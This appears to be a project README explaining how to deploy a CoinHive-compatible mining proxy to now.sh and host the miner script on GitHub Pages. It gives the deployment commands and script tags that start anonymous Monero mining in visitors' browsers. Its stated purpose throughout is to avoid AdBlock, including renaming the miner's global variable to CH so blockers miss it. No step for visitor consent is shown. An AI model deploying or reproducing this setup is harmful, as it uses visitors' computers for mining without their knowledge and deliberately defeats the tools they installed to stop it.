Deploy coin-hive-stratum
proxy for free to now.sh
+ GitHub Pages
and avoid AdBlock.
Just deploy this repo to now.sh
This will deploy a proxy instance to your now.sh
account, and it will give you a url like this: https://coin-hive-stratum-zmuahmjuur.now.sh
.
Finally, change the name of the instance. To do so, install now
if you don’t have it yet:
npm i -g now
Login with the same account where you deployed your proxy:
now login
And rename your proxy like this:
now alias coin-hive-stratum-zmuahmjuur.now.sh my-proxy.now.sh
Now your proxy is accessible from wss://my-proxy.now.sh
.
This is YOUR-SERVER-URL.
First, fork this repo.
Now, change its name to my-proxy
(Settings > Rename).
This will create a github page under you github’s account with all the required static assets.
After that you will be able to access the miner via https://<YOUR-GITHUB-USERNAME>.github.io/my-proxy/m.js
This is your YOUR-CLIENT-URL.
Now instead of using CoinHive’s miner:
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
You should use your miner like this:
<script src="YOUR-CLIENT-URL?proxy=YOUR-SERVER-URL?pool=HOST:PORT"></script>
This is an example of how it should look like:
<script src="https://cazala.github.io/my-proxy/m.js?proxy=wss://my-proxy.now.sh?pool=pool.supportxmr.com:3333"></script>
Also, instead of using the CoinHive
global variable use CH
(this is to avoid AdBlock), ie:
<script src="https://cazala.github.io/my-proxy/m.js?proxy=wss://my-proxy.now.sh?pool=pool.supportxmr.com:3333"></script>
<script>
var miner = CH.Anonymous('SITE_KEY');
miner.start();
</script>